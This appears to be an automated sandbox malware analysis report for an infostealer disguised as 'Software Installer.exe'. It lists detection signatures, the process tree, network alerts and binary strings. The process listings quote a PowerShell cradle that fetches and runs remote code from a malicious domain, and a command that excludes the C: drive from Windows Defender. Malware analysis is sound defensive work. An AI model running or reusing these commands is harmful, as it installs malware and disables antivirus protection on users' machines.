
Windows Analysis Report
Software Installer.exe

Overview

General Information

Sample name: Software Installer.exe
Analysis ID: 1638808
MD5: 03ee281b5c88911c6b6f68c0fcb561ca
SHA1: 4bcea9df6704f364be972b22218ad74b845972d9
SHA256: dec4046b525ec4584bee143b78e3ff0e52640c76a6a8c1390ba9a061888a7b6b
Tags: exe, user-TornadoAV_dev

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Software Installer.exe (PID: 332 cmdline: "C:\Users\user\Desktop\Software Installer.exe" MD5: 03EE281B5C88911C6B6F68C0FCB561CA)
    • powershell.exe (PID: 7032 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7064 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1388 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Microsoft_Driver_vs_2019.exe (PID: 6976 cmdline: "C:\Users\user\Microsoft_Driver_vs_2019.exe" MD5: F9F46E1BC998F0EBA758D7B1E0D7A6C3)
      • conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7064
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe
Source: Network Connection; Author: Kiran kumar s, oscd.community; Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8060, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49725
Source: Process started; Author: frack113; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-14T19:43:46.164328+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:48.116256+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49729 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:49.206224+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:50.419358+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:51.807938+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:53.426240+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49734 | 188.114.97.3 | 443 | TCP
2025-03-14T19:43:55.811500+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49735 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-14T19:43:34.803309+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.26.13.205 | 80 | TCP
2025-03-14T19:43:35.303339+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 208.95.112.1 | 80 | TCP
2025-03-14T19:43:37.287689+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 104.26.13.205 | 80 | TCP
2025-03-14T19:43:37.303339+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 208.95.112.1 | 80 | TCP
2025-03-14T19:43:41.968876+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 104.26.13.205 | 80 | TCP
2025-03-14T19:43:41.968965+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 104.26.13.205 | 80 | TCP
2025-03-14T19:43:42.006449+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 208.95.112.1 | 80 | TCP
2025-03-14T19:43:42.382261+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 208.95.112.1 | 80 | TCP
2025-03-14T19:43:42.895101+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 172.67.159.94 | 443 | TCP
2025-03-14T19:43:43.117187+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 172.67.159.94 | 443 | TCP
2025-03-14T19:43:45.506475+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 104.26.13.205 | 80 | TCP
2025-03-14T19:43:45.584590+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 208.95.112.1 | 80 | TCP
2025-03-14T19:43:45.678631+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49724 | 172.67.159.94 | 443 | TCP
2025-03-14T19:43:50.494726+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 172.67.159.94 | 443 | TCP
2025-03-14T19:43:59.102264+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 172.67.159.94 | 443 | TCP
2025-03-14T19:44:15.707739+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49739 | 172.67.159.94 | 443 | TCP
2025-03-14T19:44:48.336079+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49740 | 172.67.159.94 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-14T19:43:24.564383+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 172.67.159.94 | 443 | TCP


AV Detection

Source: https://citydisco.bet/gdJISz; Avira URL Cloud: Label: malware
Source: https://citydisco.bet/y; Avira URL Cloud: Label: malware
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 13_2_0041C833 CryptUnprotectData,CryptUnprotectData,13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 13_2_0041BCC0 CryptUnprotectData,13_2_0041BCC0
Source: unknown; HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: Software Installer.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdbSHA256_ source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256sU4T source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA2564w5 source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdb source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256u source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256CS source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256j source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256@ source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
